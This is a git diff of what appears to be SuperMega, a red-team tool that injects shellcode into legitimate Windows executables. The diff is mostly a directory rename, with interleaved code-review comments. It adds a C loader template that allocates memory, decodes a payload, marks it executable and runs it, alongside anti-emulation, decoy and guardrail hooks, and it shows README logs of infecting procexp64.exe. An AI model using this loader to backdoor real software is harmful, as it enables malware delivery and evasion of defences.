diff --git a/.gitignore b/.gitignore index 020dbc2..cee547a 100644 --- a/.gitignore +++ b/.gitignore @@ -5,12 +5,6 @@ tools/ doc/ projects/* -!projects/default/ -!projects/default/** - -data/binary/exes_more/ -data/source/payload/ -data/binary/exes/* log-* *.verify.exe diff --git a/README.md b/README.md index 1a8c7b9..dc7398f 100644 --- a/README.md +++ b/README.md @@ -100,7 +100,7 @@ C:\Users\dobin\Repos\SuperMega>python.exe supermega.py (helper.py ) > Run process: ml64.exe projects/commandline/main.asm /link /OUT:projects/commandline/main.exe /entry:AlignRSP (assembler.py ) Carrier Size: 590 (injector.py ) -[ Injecting Carrier -(injector.py ) Injectable: data/binary/exes/procexp64.exe -> projects/commandline/procexp64.infected.exe +(injector.py ) Injectable: data/binary/injectables/procexp64.exe -> projects/commandline/procexp64.infected.exe (injector.py ) Checking if IAT entries required by carrier are available (injector.py ) IAT entries missing: 0 (injector.py ) Inject: Write Carrier to 0x71C8D (0x7108D) @@ -112,7 +112,7 @@ C:\Users\dobin\Repos\SuperMega>python.exe supermega.py To inject shellcode `messagebox.bin` into injectable `procexp64.exe` with carrier `alloc_rw_rx` and decoder `xor_1`, where: * shellcode `messagebox.bin`: `data/binary/shellcodes/messagebox.bin` -* injectable `procexp64.exe`: `data/binary/exes/procexp64.exe` +* injectable `procexp64.exe`: `data/binary/injectables/procexp64.exe` * carrier `alloc_rw_rx`: `data/source/carrier/alloc_rw_rx/template.c` * decoder `xor_1`: `data/source/decoder/xor_1.c` 
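Review bot: Dropping `!projects/default/` and `!projects/default/**` while `projects/*` stays ignored means that, after this commit, any new file under `projects/default/` is silently ignored, even though the same commit adds `projects/default/template.c` there; keep the two exception lines, or add a comment next to `projects/*` noting that `projects/default/` must be added with `git add -f`. Removing `data/binary/exes/*` without a `data/binary/injectables/*` replacement appears intentional, since the commit also adds `TestDll.dll` and `libbz2.dll` as tracked binaries, but a one-line `.gitignore` comment saying the injectables are meant to be versioned would make that explicit for the next reader.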
@@ -138,7 +138,7 @@ To inject shellcode `messagebox.bin` into injectable `procexp64.exe` with carrie (helper.py ) > Run process: ml64.exe projects/commandline/main.asm /link /OUT:projects/commandline/main.exe /entry:AlignRSP (assembler.py ) Carrier Size: 576 (injector.py ) -[ Injecting Carrier -(injector.py ) Injectable: data/binary/exes/procexp64.exe -> projects/commandline/procexp64.infected.exe +(injector.py ) Injectable: data/binary/injectables/procexp64.exe -> projects/commandline/procexp64.infected.exe (injector.py ) Checking if IAT entries required by carrier are available (injector.py ) IAT entries missing: 0 (injector.py ) Inject: Write Carrier to 0x71C43 (0x71043) @@ -175,7 +175,7 @@ community edition. Input: * `data/binary/shellcodes`: Input: Shellcodes we want to use as input (payload). .bin -* `data/binary/exes/`: Input: Nonmalicious EXE files we inject into. .exe +* `data/binary/injectables/`: Input: Nonmalicious EXE files we inject into. .exe Output: * `projects/`: output: Project directory with generated files, including infected exe diff --git a/app/templates/index.html b/app/templates/index.html index ba4249a..8001dbb 100644 --- a/app/templates/index.html +++ b/app/templates/index.html @@ -24,7 +24,7 @@ The original functionality of the EXE/DLL will not work anymore (it will only execute the carrier with the shellcode it is carrying)
- Located in the data/binary/exes/ directory.
+ Located in the data/binary/injectables/ directory.

Carrier

diff --git a/app/templates/exe.html b/app/templates/injectable.html similarity index 100% rename from app/templates/exe.html rename to app/templates/injectable.html diff --git a/app/templates/exes.html b/app/templates/injectables.html similarity index 64% rename from app/templates/exes.html rename to app/templates/injectables.html index e5c8dda..6befd6a 100644 --- a/app/templates/exes.html +++ b/app/templates/injectables.html @@ -8,18 +8,18 @@
- Injectables in data/binary/exes + Injectables in data/binary/injectables - {% for exe in exes %} -

{{exe['name']}}

- More details + {% for injectable in injectables %} +

{{injectable['name']}}

+ More details - {% for section in exe['sections'] %} + {% for section in injectable['sections'] %} diff --git a/app/templates/navigation.html b/app/templates/navigation.html index b369f30..9ad525b 100644 --- a/app/templates/navigation.html +++ b/app/templates/navigation.html @@ -23,8 +23,8 @@ href="/projects">Projects diff --git a/app/templates/project.html b/app/templates/project.html index 50d627c..786aaa2 100644 --- a/app/templates/project.html +++ b/app/templates/project.html @@ -78,18 +78,18 @@
@@ -110,7 +110,7 @@
- EXE Info: + EXE Info:
  • {% if is_64 %} diff --git a/app/views.py b/app/views.py index 2a3c839..9804765 100644 --- a/app/views.py +++ b/app/views.py @@ -17,15 +17,15 @@ def index(): return render_template('index.html') -@views.route("/exes/") -def exe_view(exe_name): - filepath = "{}{}".format(PATH_EXES, exe_name) +@views.route("/injectables/") +def injectable_view(exe_name): + filepath = "{}{}".format(PATH_INJECTABLES, exe_name) if not os.path.exists(filepath): return "File not found: {}".format(exe_name) superpe = SuperPe(filepath) - return render_template('exe.html', + return render_template('injectable.html', superpe=superpe, resolved_dlls=resolve_dlls(superpe), iat=superpe.get_iat_entries(), @@ -33,16 +33,16 @@ def exe_view(exe_name): ) -@views.route("/exes") -def exes_view(): - exes = [] - for file in os.listdir(PATH_EXES): +@views.route("/injectables") +def injectables_view(): + injectables = [] + for file in os.listdir(PATH_INJECTABLES): if not file.endswith(".dll") and not file.endswith(".exe"): continue if '.verify' in file or '.test' in file: continue - superpe = SuperPe("{}/{}".format(PATH_EXES, file)) + superpe = SuperPe("{}/{}".format(PATH_INJECTABLES, file)) e = { 'name': file, @@ -50,9 +50,9 @@ def exes_view(): #'iat': superpe.get_iat_entries(), 'sections': superpe.pe_sections, } - exes.append(e) + injectables.append(e) #break - return render_template('exes.html', exes=exes) + return render_template('injectables.html', injectables=injectables) @views.app_template_filter('hexint') diff --git a/app/views_project.py b/app/views_project.py index 9babd9e..5aa0660 100644 --- a/app/views_project.py +++ b/app/views_project.py @@ -47,8 +47,7 @@ def project(name): if project_setting == None: logger.error("Project {} not found".format(name)) return redirect("/projects", code=302) - - project_setting.print() + #project_setting.print() is_built = False if os.path.exists(project_setting.get_inject_exe_out()): 
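Review bot: In `injectable_view`, the renamed line `filepath = "{}{}".format(PATH_INJECTABLES, exe_name)` still builds the path directly from the URL segment and the only check is `os.path.exists`, so a segment that is not a plain file name in the directory reaches `SuperPe`; checking `exe_name == os.path.basename(exe_name)` and that it ends in `.dll`/`.exe`, the same filter `injectables_view` already applies, would keep the two views consistent. The `"File not found: {}".format(exe_name)` reply echoes the raw segment back in a text/html response; `abort(404)` avoids reflecting request input. Also, `injectables_view` joins with `"{}/{}"` while `injectable_view` uses `"{}{}"`; `PATH_INJECTABLES` already ends in `/` (see the `model/defs.py` hunk), so `os.path.join(PATH_INJECTABLES, name)` in both would remove the doubled slash. `injectable_view` continues past the first hunk.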
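Review bot: `#project_setting.print()` leaves commented-out code in `project()`; if the dump is no longer wanted, delete the line (history keeps it), and if it is wanted on demand, make it `logger.debug(...)` instead of a commented call. The surrounding context line `if project_setting == None:` would read better as `if project_setting is None:`. `project()` continues past this hunk.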
@@ -97,7 +96,7 @@ def project(name): project_dir = os.path.dirname(os.getcwd() + "\\" + project_setting.project_path) log_files = get_logfiles(project_setting.project_path) - exes = list_files_and_sizes(PATH_EXES) + injectables = list_files_and_sizes(PATH_INJECTABLES) shellcodes = list_files_and_sizes(PATH_SHELLCODES) carrier_names = get_template_names() @@ -117,7 +116,7 @@ def project(name): project_dir=project_dir, settings=project_setting, - exes=exes, + injectables=injectables, shellcodes=shellcodes, carrier_names=carrier_names, decoder_styles=decoder_styles, diff --git a/data/binary/exes/7z.exe b/data/binary/injectables/7z.exe similarity index 100% rename from data/binary/exes/7z.exe rename to data/binary/injectables/7z.exe diff --git a/data/binary/injectables/TestDll.dll b/data/binary/injectables/TestDll.dll new file mode 100644 index 0000000..c451717 Binary files /dev/null and b/data/binary/injectables/TestDll.dll differ diff --git a/data/binary/exes/iattest-full.exe b/data/binary/injectables/iattest-full.exe similarity index 100% rename from data/binary/exes/iattest-full.exe rename to data/binary/injectables/iattest-full.exe diff --git a/data/binary/injectables/libbz2.dll b/data/binary/injectables/libbz2.dll new file mode 100644 index 0000000..cd5e11a Binary files /dev/null and b/data/binary/injectables/libbz2.dll differ diff --git a/data/binary/exes/procexp64.exe b/data/binary/injectables/procexp64.exe similarity index 100% rename from data/binary/exes/procexp64.exe rename to data/binary/injectables/procexp64.exe diff --git a/data/binary/exes/wifiinfoview.exe b/data/binary/injectables/wifiinfoview.exe similarity index 100% rename from data/binary/exes/wifiinfoview.exe rename to data/binary/injectables/wifiinfoview.exe diff --git a/model/defs.py b/model/defs.py index fdd33d8..7e9ac80 100644 --- a/model/defs.py +++ b/model/defs.py 
@@ -7,10 +7,11 @@ class FilePath(str): # with data/shellcodes/createfile.bin VerifyFilename: FilePath = FilePath("C:\\Temp\\a") -# Directory structure -PATH_EXES = "data/binary/exes/" - +# Input Binary +PATH_INJECTABLES = "data/binary/injectables/" PATH_SHELLCODES = "data/binary/shellcodes/" + +# Input Source PATH_CARRIER = "data/source/carrier/" PATH_DECODER = "data/source/decoder/" PATH_ANTIEMULATION = "data/source/antiemulation/" @@ -18,7 +19,7 @@ PATH_DECOY = "data/source/decoy/" PATH_GUARDRAILS = "data/source/guardrails/" PATH_VIRTUALPROTECT = "data/source/virtualprotect/" -PATH_PAYLOAD = "data/source/payload/" +# Project settings PATH_WEB_PROJECT = "projects/" diff --git a/model/settings.py b/model/settings.py index 7cdb8a5..ffa2957 100644 --- a/model/settings.py +++ b/model/settings.py @@ -16,7 +16,7 @@ class Settings(): self.project_exe_path: FilePath = FilePath(self.project_path + "main.exe") self.project_shc_path: FilePath = FilePath(self.project_path + "main.bin") - # IN: Injectable (like "7z.exe", in data/input/exes/) + # IN: Injectable (like "7z.exe", in data/input/injectables/) self.injectable_base: str = "" # IN: Payload / Shellcode (like "createfile.bin", in data/input/shellcodes/) self.payload_base: str = "" @@ -62,7 +62,7 @@ class Settings(): def get_inject_exe_in(self) -> FilePath: if self.injectable_base == "": return None - return FilePath(PATH_EXES + self.injectable_base) + return FilePath(PATH_INJECTABLES + self.injectable_base) def get_inject_exe_out(self) -> FilePath: return FilePath("{}{}".format( diff --git a/projects/default/template.c b/projects/default/template.c new file mode 100644 index 0000000..5f328eb --- /dev/null +++ b/projects/default/template.c 
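Review bot: `PATH_PAYLOAD` is deleted from `model/defs.py`, but no hunk in this diff removes a consumer of it, so any module that still imports it will fail at import time; a grep for `PATH_PAYLOAD` before merging would confirm it was unused (the matching `.gitignore` entry `data/source/payload/` is removed in the same commit, which suggests the directory itself is gone). The new section comments are a good idea; `# Input Binary` could say what the two constants hold, e.g. `# Input Binary: EXE/DLL files to inject into (PATH_INJECTABLES) and raw shellcode (PATH_SHELLCODES)`.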
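Review bot: The updated comment `# IN: Injectable (like "7z.exe", in data/input/injectables/)` still carries the wrong prefix: `PATH_INJECTABLES` in this same diff is `data/binary/injectables/`, so it should read `in data/binary/injectables/` (the context line below it has the same stale `data/input/shellcodes/`). In the second `model/settings.py` hunk, `get_inject_exe_in` is annotated `-> FilePath` but returns `None` when `injectable_base` is empty; annotating it `-> Optional[FilePath]` (from `typing`) or `-> FilePath | None` would warn callers that they must handle the `None` case.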
@@ -0,0 +1,62 @@
+#include
+
+#include
+
+char *supermega_payload;
+
+#define p_RW 0x04
+#define p_RX 0x20
+#define p_RWX 0x40
+
+
+{{plugin_antiemulation}}
+
+{{plugin_decoy}}
+
+{{plugin_executionguardrail}}
+
+{{plugin_virtualprotect}}
+
+/* VirtualAlloc -> rw -> rx
+
+ * create new memory region for the payload
+ * will set it to RX (may break some shellcodes, opsec-safe)
+*/
+
+int main()
+{
+ DWORD result;
+
+ // Call: Execution Guardrail
+ if (executionguardrail() != 0) {
+ return 1;
+ }
+
+ // Call: Anti Emulation plugin
+ antiemulation();
+
+ // Call: Decoy plugin
+ decoy();
+
+ // Allocate 1
+ // char *dest = ...
+ char *dest = VirtualAlloc(NULL, {{PAYLOAD_LEN}}, 0x3000, p_RW);
+
+ // Wait a bit
+ //Sleep(2000);
+
+ // Copy (and decode)
+ // from: supermega_payload[]
+ // to: dest[]
+{{ plugin_decoder }}
+
+ if (MyVirtualProtect(dest, {{PAYLOAD_LEN}}, p_RX, &result) == 0) {
+ return 7;
+ }
+
+ // Execute *dest
+ (*(void(*)())(dest))();
+
+ return 0;
+}
+
diff --git a/supermega.py b/supermega.py
index e135ab7..75e79c8 100644
--- a/supermega.py
+++ b/supermega.py
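Review bot: `VirtualAlloc` can return NULL and `dest` is handed straight to the decoder block and to `MyVirtualProtect` without a check; a guard such as `if (dest == NULL) { return 2; }` right after the allocation would give a distinct exit code, in line with the `return 1` / `return 7` convention already used, instead of a fault. The literal `0x3000` sits next to the named `p_RW`/`p_RX`/`p_RWX` defines; `windows.h` already names it as `MEM_COMMIT | MEM_RESERVE` (and `PAGE_READWRITE` / `PAGE_EXECUTE_READ` for the protection values), which would make the allocation line self-describing. The two `#include` lines show no header names in this view, presumably because the angle-bracketed names were stripped in rendering; worth confirming the committed file still names the headers it needs.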
@@ -30,7 +30,7 @@ def main(): parser = argparse.ArgumentParser(description='SuperMega shellcode loader') parser.add_argument('--shellcode', type=str, help='payload shellcode: data/binary/shellcodes/* (messagebox.bin, calc64.bin, ...)', default="calc64.bin") - parser.add_argument('--inject', type=str, help='which exe to inject into: data/binary/exes/* (7z.exe, procexp64.exe, ...)', default="procexp64.exe") + parser.add_argument('--inject', type=str, help='which exe to inject into: data/binary/injectables/* (7z.exe, procexp64.exe, ...)', default="procexp64.exe") parser.add_argument('--carrier', type=str, help='carrier: data/source/carrier/* (alloc_rw_rx, peb_walk, ...)', default="alloc_rw_rx") parser.add_argument('--decoder', type=str, help='decoder: data/source/decoders/* (xor_1, xor_2, plain, ...)', default="xor_2") parser.add_argument('--antiemulation', type=str, help='anti-emulation: data/source/antiemulation/* (sirallocalot, timeraw, none, ...)', default="sirallocalot") diff --git a/tests/test_datareuse.py b/tests/test_datareuse.py index 0e1ef93..8af1a12 100644 --- a/tests/test_datareuse.py +++ b/tests/test_datareuse.py @@ -36,7 +36,7 @@ class DataReuseTest(unittest.TestCase): self.assertIsNotNone(hole) def test_relocation_list(self): - superpe = SuperPe(PATH_EXES + "7z.exe") + superpe = SuperPe(PATH_INJECTABLES + "7z.exe") relocs = superpe.get_relocations_for_section(".rdata") self.assertEqual(836, len(relocs)) reloc = relocs[0] @@ -48,7 +48,7 @@ class DataReuseTest(unittest.TestCase): def test_relocmanager(self): """Test reference EXE reloc manager information""" - superpe = SuperPe(PATH_EXES + "procexp64.exe") + superpe = SuperPe(PATH_INJECTABLES + "procexp64.exe") rm = superpe.get_rdata_rangemanager() self.assertEqual(61, len(rm.intervals)) # 0x1ab0 is magic currently (should use find_first_utf16_string_offset() 
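Review bot: The `--inject` help string is updated, but the `--decoder` help on the next context line still points at `data/source/decoders/*`, while `model/defs.py` in this same diff defines `PATH_DECODER = "data/source/decoder/"`; since this commit is already correcting path strings in help text, `help='decoder: data/source/decoder/* (xor_1, xor_2, plain, ...)'` would keep them in agreement. `main()` continues past this hunk.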
@@ -57,7 +57,7 @@ class DataReuseTest(unittest.TestCase): def test_largestgap(self): - superpe = SuperPe(PATH_EXES + "7z.exe") + superpe = SuperPe(PATH_INJECTABLES + "7z.exe") rm = superpe.get_rdata_rangemanager() start, stop = rm.find_hole(100) self.assertEqual(394513, start) diff --git a/tests/test_derbackdoorer.py b/tests/test_derbackdoorer.py index 80ced9d..47c79fe 100644 --- a/tests/test_derbackdoorer.py +++ b/tests/test_derbackdoorer.py @@ -16,7 +16,7 @@ class DerBackdoorerTest(unittest.TestCase): def test_function_backdoorer_exe(self): - superpe = SuperPe(PATH_EXES + "iattest-full.exe") + superpe = SuperPe(PATH_INJECTABLES + "iattest-full.exe") function_backdoorer = FunctionBackdoorer(superpe, depth_option=DEPTH_OPTIONS.LEVEL1) addr = function_backdoorer.find_suitable_instruction_addr(superpe.get_entrypoint()) @@ -24,7 +24,7 @@ class DerBackdoorerTest(unittest.TestCase): def test_function_backdoorer_dll(self): - superpe = SuperPe(PATH_EXES + "TestDLL.dll") + superpe = SuperPe(PATH_INJECTABLES + "TestDLL.dll") function_backdoorer = FunctionBackdoorer(superpe) addr = function_backdoorer.find_suitable_instruction_addr(superpe.get_entrypoint()) diff --git a/tests/test_dllresolver.py b/tests/test_dllresolver.py index 2bc5efb..2567757 100644 --- a/tests/test_dllresolver.py +++ b/tests/test_dllresolver.py @@ -10,7 +10,7 @@ from pe.dllresolver import * class DllResolverTest(unittest.TestCase): def test_dllresolver(self): - filename = "data/binary/exes/7z.exe" + filename = "data/binary/injectables/7z.exe" superpe = SuperPe(filename) self.assertTrue(all_dll_exist(superpe)) diff --git a/tests/test_superpe.py b/tests/test_superpe.py index 2011ef5..4fe0fd8 100644 --- a/tests/test_superpe.py +++ b/tests/test_superpe.py @@ -9,7 +9,7 @@ from pe.superpe import SuperPe, PeSection class SuperPeTest(unittest.TestCase): def test_exe(self): - dll_filepath = PATH_EXES + "procexp64.exe" + dll_filepath = PATH_INJECTABLES + "procexp64.exe" superpe = SuperPe(dll_filepath) # Properties 
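Review bot: `test_function_backdoorer_dll` opens `PATH_INJECTABLES + "TestDLL.dll"`, but the binary this commit adds is `data/binary/injectables/TestDll.dll` (lower-case `ll`), so on a case-sensitive filesystem the test fails with a missing file even though it passes on Windows. `test_dll` in `tests/test_superpe.py` (the last hunk) uses the same spelling. Either rename the added file or change both tests to `PATH_INJECTABLES + "TestDll.dll"`.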
@@ -70,7 +70,7 @@ class SuperPeTest(unittest.TestCase): def test_dll(self): - dll_filepath = PATH_EXES + "TestDLL.dll" + dll_filepath = PATH_INJECTABLES + "TestDLL.dll" superpe = SuperPe(dll_filepath) # Properties
name raw size
{{section['name']}} {{section['raw_size']}}